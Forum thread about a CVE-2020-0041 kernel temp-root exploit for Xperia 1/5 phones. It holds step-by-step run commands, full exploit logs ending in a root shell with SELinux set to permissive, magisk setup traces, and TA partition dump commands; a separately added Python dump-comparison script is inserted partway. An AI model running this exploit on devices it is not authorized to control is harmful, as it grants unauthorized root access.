[xperia 1/5] temp root exploit via CVE-2020-0041 including magisk setup


CM users

Member
Dec 1, 2016
OK, so I'm super new to Sony devices, and I have an Xperia 1 AU Single Sim (SOV40) variant. It's currently on the latest Android 11, 55.2.C.3.2.1. Is this particular firmware supported by the temp root exploit?
 

CM users

Member
Dec 1, 2016
@j4nn hi j4nn, I added the firmware list for your exploit. Maybe someone needs it for the Xperia 1 AU (SOV40) by version 55.1.C.0.168.
I downgraded my Xperia 1 AU to 55.1.C.0.168, but it's not working for me and I have no idea why:

SOV40:/ $ cd /data/local/tmp
SOV40:/data/local/tmp $ ./temp-x1
[+] factoryversion = 'SOV40-55.1.C.0.168'
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffde4aaa1600
[+] file epitem at ffffffde1b9b5f80
[+] Reallocating content of 'write8_inode' with controlled data....[DONE]
[+] Overwriting 0xffffffde4aaa1620 with 0xffffffde1b9b5fd0...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff8be34212d0
[+] kernel base: ffffff8be2080000
[+] init_cred: ffffff8be422d808
[+] memstart_addr: 0xffffffe340000000
[+] First level entry: 118203003 -> next table at ffffffddd8203000
[+] Second level entry: 16e1ad003 -> next table at ffffffde2e1ad000
[+] sysctl_table_root = ffffff8be425d380
[+] Reallocating content of 'write8_sysctl' with controlled data.............[DONE]
[+] Overwriting 0xffffffdeb52bcf68 with 0xffffffdde9e34000...[DONE]
[+] Injected sysctl node!
[+] Reallocating content of 'write8_selinux' with controlled data....[DONE]
[+] Overwriting 0xffffff8be4972ffc with 0x0...[DONE]
[+] Node write8_inode, pid 15486, kaddr ffffffde1fb12980
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 15527, kaddr ffffffde5a025e80
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 15545, kaddr ffffffde85dc5f00
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffde4aaa1620
[+] epitem.prev = ffffffde4aaa16d0
[+] Launching privileged shell
127|SOV40:/data/local/tmp $ ./magisk-start.sh -1
+ FRESH=false
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ FRESH=true
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
fopen: /sys/fs/selinux/policy failed with 13: Permission denied
 

Shiro39

Senior Member
Dec 27, 2018
Not sure what's wrong, but I can't get it to work.

Device: SOV40
Firmware: J8110's Customized UK 55.1.A.0.784

The device rebooted on its own several times previously.
It doesn't reboot anymore, but it also still doesn't elevate to a privileged shell.


Code:
D:\Utility\scrcpy>adb shell
J8110:/ $ cd /data/local/tmp
J8110:/data/local/tmp $ ./x1x5-mroot
[+] factoryversion = 'J8110-55.1.A.0.748'
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffe323c3dc00
[+] file epitem at ffffffe42b6b5f80
[+] Reallocating content of 'write8_inode' with controlled data.........[DONE]
[+] Overwriting 0xffffffe323c3dc20 with 0xffffffe42b6b5fd0...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff9d478212d0
[+] kernel base: ffffff9d46480000
[+] init_cred: ffffff9d4862d808
[+] memstart_addr: 0xffffffddc0000000
[+] First level entry: 15a221003 -> next table at ffffffe39a221000
[+] Second level entry: 1ebb56003 -> next table at ffffffe42bb56000
[+] sysctl_table_root = ffffff9d4865d380
[+] Reallocating content of 'write8_sysctl' with controlled data...........[DONE]
[+] Overwriting 0xffffffe4352bcb68 with 0xffffffe41a62b000...[DONE]
[+] Injected sysctl node!
[+] Reallocating content of 'write8_selinux' with controlled data...[DONE]
[+] Overwriting 0xffffff9d48d71ffc with 0x0...[DONE]
[+] Node write8_inode, pid 13045, kaddr ffffffe42b548680
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 12606, kaddr ffffffe365a51380
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 12915, kaddr ffffffe39dc8ad00
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffe323c3dc20
[+] epitem.prev = ffffffe323c3dcd0
[+] Launching privileged shell
J8110:/data/local/tmp $ ./magisk-start.sh -1
+ FRESH=false
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ FRESH=true
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
fopen: /sys/fs/selinux/policy failed with 13: Permission denied
1|J8110:/data/local/tmp $


I replaced two .sin files from J9110's Customized SEA firmware to get VoLTE working,
but I don't think that matters...
Code:
oem_other_X-FLASH-CUST-A2CD.sin
oem_X-FLASH-CUST-A2CD.sin
 

pEtErtgh

Member
Jul 24, 2022
I tried on a J9110 with storefront firmware, which has the same build number as in the list mentioned above, but when I run it, it stops, and after trying a few more times it restarts.

Code log:

J9110:/ $ cd /data/local/tmp
J9110:/data/local/tmp $ unzip x1x5-mroot.zip
Archive: x1x5-mroot.zip
replace magisk-start.sh? [y]es, [n]o, [A]ll, [N]one: A
inflating: magisk-start.sh
inflating: magisk-setup.sh
inflating: x1x5-mroot
J9110:/data/local/tmp $ unzip x1x5-mroot.zip
Archive: x1x5-mroot.zip
replace magisk-start.sh? [y]es, [n]o, [A]ll, [N]one: A
inflating: magisk-start.sh
inflating: magisk-setup.sh
inflating: x1x5-mroot
J9110:/data/local/tmp $ chmod 755 x1x5-mroot magisk-setup.sh magisk-start.sh
J9110:/data/local/tmp $ ./magisk-setup.sh
+ '[' '' '=' --cleanup ']'
+ ZIPFILE=Magisk-v20.4.zip
+ '[' ! -d magisk ']'
J9110:/data/local/tmp $ cd /data/local/tmp
J9110:/data/local/tmp $ ./x1x5-mroot
[+] factoryversion = 'J9110-55.1.A.3.107'
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffc1e9781200
[+] file epitem at ffffffc21cd1bd80
[+] Reallocating content of 'write8_inode' with controlled data..............


It restarts after 'data.........'


I tried again many times, but it cannot finish.
 

Aqq123

Senior Member
Aug 27, 2009
I try, but it shows it cannot find the TA file inside.
What was the output from dd then? It needs to be run as superuser (so use su for that).
Another way to run it, as a single command:

adb shell su -c dd if=/dev/block/bootdevice/by-name/TA of=/data/local/tmp/TA.bin

Then, assuming it worked:

adb shell su -c chown shell.shell /data/local/tmp/TA.bin

And you should be able to copy the file.
 

pEtErtgh

Member
Jul 24, 2022
What was the output from dd then? It needs to be run as superuser (so use su for that).
Another way to run it, as a single command:

adb shell su -c dd if=/dev/block/bootdevice/by-name/TA of=/data/local/tmp/TA.bin

Then, assuming it worked:

adb shell su -c chown shell.shell /data/local/tmp/TA.bin

And you should be able to copy the file.
How do I copy the file? Go inside the phone directly? Go to /data/local/tmp/ and copy?
 

pEtErtgh

Member
Jul 24, 2022
What was the output from dd then? It needs to be run as superuser (so use su for that).
Another way to run it, as a single command:

adb shell su -c dd if=/dev/block/bootdevice/by-name/TA of=/data/local/tmp/TA.bin

Then, assuming it worked:

adb shell su -c chown shell.shell /data/local/tmp/TA.bin

And you should be able to copy the file.
It shows:
16384+0 records in
16384+0 records out
8388608 bytes (8.0 M) copied, 0.036710 s, 218 M/s

But I don't know which command line to use to copy it out and save it?
 

Aqq123

Senior Member
Aug 27, 2009
It shows:
16384+0 records in
16384+0 records out
8388608 bytes (8.0 M) copied, 0.036710 s, 218 M/s

But I don't know which command line to use to copy it out and save it?
So it worked. A dump of the TA partition is in the file /data/local/tmp/TA.bin. You can copy it however you want, for example with:

adb pull /data/local/tmp/TA.bin

Alternatively, use some filesystem explorer app like Solid Explorer.
 

pEtErtgh

Member
Jul 24, 2022
So it worked. A dump of the TA partition is in the file /data/local/tmp/TA.bin. You can copy it however you want, for example with:

adb pull /data/local/tmp/TA.bin

Alternatively, use some filesystem explorer app like Solid Explorer.

I cannot back up because I can't find or save the TA file from

/data/local/tmp/


although when I check, it shows that clearly below:

It shows:
16384+0 records in
16384+0 records out
8388608 bytes (8.0 M) copied, 0.036710 s, 218 M/s


But I tried many methods and it shows that it cannot find the file or the file doesn't exist (I don't remember the code log because I have only 1 main phone, so it wastes time to give proof).

And I also tried to back up via Flashtool (temp rooted) and many BackupTA tool versions from many posts on XDA, but in general: no way to back them up.
 

Top Liked Posts

    temp root exploit for sony XPERIA 1 and XPERIA 5 with android 10 firmware
    including temporary magisk setup from the exploit

    The exploit uses CVE-2020-0041, originally designed for the Pixel 3 running kernel 4.9.
    This is a modification of the Pixel 3 specific exploit to be compatible with kernel 4.14, which is used in the xperia 1/5 phones.
    This work has been done in collaboration with @bb-qq, who implemented support for the JP model of xperia 1.
    The exploit is extended in a way that allows setup of magisk v20.4 from the temp root, including a working su permission request notification.
    It uses some novel techniques to overcome the limitations caused by magisk being run from a temp root instead of being integrated into the boot process as an android service.
    There are also many extensions implemented to make the exploit stable with kernel 4.14.

    SUPPORTED TARGETS
    The exploit has been tested only with the JP model of xperia 1 (the 802SO-55.1.B.0.202 target), but support for other targets has been implemented based on static analysis of each kernel image from the target firmware.
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case in which the exploit could work with a different fw version (or a different phone model) would be if it used a binary-identical kernel image in the firmware.

    USAGE HOWTO INCLUDING MAGISK SETUP
    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the x1x5-mroot.zip with the exploit attached in this post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push x1x5-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      Code:
      cd /data/local/tmp
      unzip x1x5-mroot.zip
      chmod 755 x1x5-mroot magisk-setup.sh magisk-start.sh
      ./magisk-setup.sh
    • get temp root and start magisk up with following commands in 'adb shell' - do not copy paste them all at once, but enter (or copy&paste) each line separately one by one:
      Code:
      cd /data/local/tmp
      ./x1x5-mroot
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3

    If it worked, you should see something like this:

    Code:
    802SO:/ $ cd /data/local/tmp
    802SO:/data/local/tmp $ ./x1x5-mroot
    [+] factoryversion = '802SO-55.1.B.0.202'
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffe5cd6e3b00
    [+] file epitem at ffffffe54d87eb00
    [+] Reallocating content of 'write8_inode' with controlled data..[DONE]
    [+] Overwriting 0xffffffe5cd6e3b20 with 0xffffffe54d87eb50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff90392212d0
    [+] kernel base: ffffff9037e80000
    [+] init_cred: ffffff903a02d808
    [+] memstart_addr: 0xffffffdbc0000000
    [+] First level entry: 145437003 -> next table at ffffffe585437000
    [+] Second level entry: 1e6b41003 -> next table at ffffffe626b41000
    [+] sysctl_table_root = ffffff903a05d380
    [+] Reallocating content of 'write8_sysctl' with controlled data.[DONE]
    [+] Overwriting 0xffffffe6352bcb68 with 0xffffffe54b8a3000...[DONE]
    [+] Injected sysctl node!
    [+] Reallocating content of 'write8_selinux' with controlled data.[DONE]
    [+] Overwriting 0xffffff903a772ffc with 0x0...[DONE]
    [+] Node write8_inode, pid 10824, kaddr ffffffe4e3d18c00
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 11452, kaddr ffffffe58324c400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 11338, kaddr ffffffe4e3c05980
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffe5cd6e3b20
    [+] epitem.prev = ffffffe5cd6e3bd0
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
    + FRESH=false
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + FRESH=true
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2
    + FRESH=false
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + FRESH=true
    + STAGE=2
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + true
    + rm -rf /data/adb/magisk.db /data/adb/magisk
    + mkdir -p /data/adb/magisk
    + chmod 700 /data/adb
    + cp -a busybox /data/adb/magisk
    + cp -a magisk /data/adb/magisk
    + cp -a magiskboot /data/adb/magisk
    + cp -a magiskinit /data/adb/magisk
    + cp -a util_functions.sh /data/adb/magisk
    + cp -a boot_patch.sh /data/adb/magisk
    + chmod -R 755 /data/adb/magisk
    + chown -R root:root /data/adb/magisk
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14100
    + '[' -z 14100 ']'
    + >/sbin/.magisk/escalate
    + echo 14100
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3
    + FRESH=false
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC=''
    + timeout=10
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14131
    + '[' -n 14131 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.14.117-perf+ #1 SMP PREEMPT Wed Jan 15 23:36:28 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce
    Permissive

    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager, or allow other apps that need root, as asking for root permission should work now.
    Please be sure to use the 'exit' command to cleanly end the temp root shell. Do not close the window instead. It is needed for proper cleanup.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or the kernel boot image, can result in a phone that no longer boots.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow making permanent changes in crucial partitions - you would need to unlock the bootloader for that.
    Some partitions might still be possible to modify - for example in the case of sony xperia xz1 phones it was possible to do a permanent debloat via changes in the /oem partition, and such a debloat would survive even a factory reset. Similarly, some modem configs have been present in /oem, allowing IMS to be set up for different operators/regions or other modem related stuff to be tuned.

    DRM KEY / TA PARTITION BACKUP POSSIBILITY
    Please note, this exploit will get you a root shell on still locked xperia 1 and 5 phones, which could allow backing up the TA partition in the still locked state, with the drm keys (the device key) still there.
    Even though xperia 1 and 5 allow re-locking the bootloader after unlock, possibly returning drm functionality, it is very probable that the device key (the device specific drm key residing in the 66667 ta unit) is still erased on bootloader unlock (and re-lock), so backing up and restoring TA with the key present may actually be useful.
    This is something to be tested - anybody considering a bootloader unlock of xperia 1 or 5, please be sure to back up TA from the still locked state via this exploit and also TA after unlock, for comparison.
    For more details see here and the following post.

    SOURCES
    Exploit sources are available at my github here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.
    Thanks to @bb-qq for initial xperia 1 support and testing.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.
    Thank you very much to all who donate.

    DOWNLOAD
    Thank you for publishing this!
    Here are all FTFs for Japanese models:
    https://ftf.andro.plus/
    Just tried restoring the locked TA backup.
    It is not able to circumvent the Has Ever Been Unlocked state, so it seems like it is stored somewhere else and thus a TA backup makes no sense... In Russia the warranty would still be void if unlocked, no matter the issue.

    Assuming you first re-locked the phone and then restored the locked TA from the exploit root shell.

    It is not only about the "Has Ever Been Unlocked" flag.
    There is a possibility that if you re-lock the bootloader _and_ restore the locked TA backup, you get all drm functionality back.
    You can check your TA-unlocked.img to see if the bootloader unlock erased the device key, i.e. the 66667 TA unit,
    while this unit should be present in the TA-locked.img.

    You can check the unit in both images by use of 'readta' command line utility, source code available here:
    Alternatively you can find built windows executable attached.

    Could you please check it, like in following way:
    Code:
    E:\mingw>readta.exe
    Usage: readta -i <ta image or partition> -u <unit> [ -o <output file> -q ]
    
    E:\mingw>readta.exe -i TA-locked.img -u 66667 -h
    15 42 87 AF 49 7C 62 37 A4 34 F7 08 C8 3F 20 0B
    E:\mingw>readta.exe -i TA-unlocked.img -u 66667 -h
    
    E:\mingw>
    This should confirm (or not) whether sony erases the drm key with bootloader unlock, possibly therefore losing some drm feature(s) that would not be restored by a bootloader re-lock, as already suspected here.
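    An added example, not j4nn's readta and not code from this thread: a format-agnostic comparison of TA-locked.img and TA-unlocked.img that lists the byte ranges the unlock changed and checks whether a 16-byte value copied from the locked dump (such as the unit 66667 bytes readta printed) still occurs in the unlocked one. It assumes both dumps were taken with the dd command above and so are the same size; it does not parse TA units, and the sample images it builds are constructed, not real TA data.

```python
import random

def changed_ranges(a, b, block=4096, merge_gap=16):
    """Half-open [start, end) byte ranges where dumps a and b differ.
    4 KiB blocks are compared first so an 8 MiB dump scans quickly; only
    differing blocks are walked byte by byte. Ranges closer than merge_gap
    bytes are merged so one rewritten unit shows up as one region."""
    if len(a) != len(b):
        raise ValueError(f"size mismatch: {len(a)} vs {len(b)} bytes")
    raw = []
    for off in range(0, len(a), block):
        end = min(off + block, len(a))
        if a[off:end] == b[off:end]:
            continue
        start = None
        for i in range(off, end):
            if a[i] != b[i]:
                start = i if start is None else start
            elif start is not None:
                raw.append((start, i))
                start = None
        if start is not None:
            raw.append((start, end))
    merged = []
    for s, e in raw:
        if merged and s - merged[-1][1] <= merge_gap:
            merged[-1] = (merged[-1][0], e)
        else:
            merged.append((s, e))
    return merged

def find_all(image, value):
    """Every offset at which the byte string value occurs in image."""
    offs, pos = [], image.find(value)
    while pos != -1:
        offs.append(pos)
        pos = image.find(value, pos + 1)
    return offs

def compare_dumps(locked, unlocked, key):
    """Report whether key (e.g. the bytes readta printed for unit 66667 from
    the locked dump) is still present after unlock, plus what else changed."""
    return {
        "changed": changed_ranges(locked, unlocked),
        "key_in_locked": find_all(locked, key),
        "key_in_unlocked": find_all(unlocked, key),
    }

def build_sample_pair(key, size=64 * 1024):
    """Constructed sample, not a real TA image: a pseudo-random 'locked'
    dump holding key at 0x2000, and an 'unlocked' copy in which that value
    is zeroed and two bytes at 0x5000 are rewritten."""
    rnd = random.Random(66667)
    locked = bytearray(rnd.getrandbits(8) for _ in range(size))
    locked[0x2000:0x2010] = key
    locked[0x5000:0x5002] = b"\x00\x00"
    unlocked = bytearray(locked)
    unlocked[0x2000:0x2010] = bytes(16)
    unlocked[0x5000:0x5002] = b"\xff\xff"
    return bytes(locked), bytes(unlocked)

if __name__ == "__main__":
    k = bytes(range(0x11, 0x21))  # constructed stand-in for a unit value
    print(compare_dumps(*build_sample_pair(k), k))
```

    On real dumps, call compare_dumps() with the contents of both files and bytes.fromhex() of the hex readta printed for the locked image; a hit in key_in_locked and none in key_in_unlocked is the outcome the post above suspects.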
    @TrustAugustus, with a functional twrp it would not be a temp root any more, would it?
    Just backup TA partition and then unlock the bootloader.
    You can re-lock with xperia 1/5 if you need.
    After re-lock, use the temp root again and restore the locked state TA backup.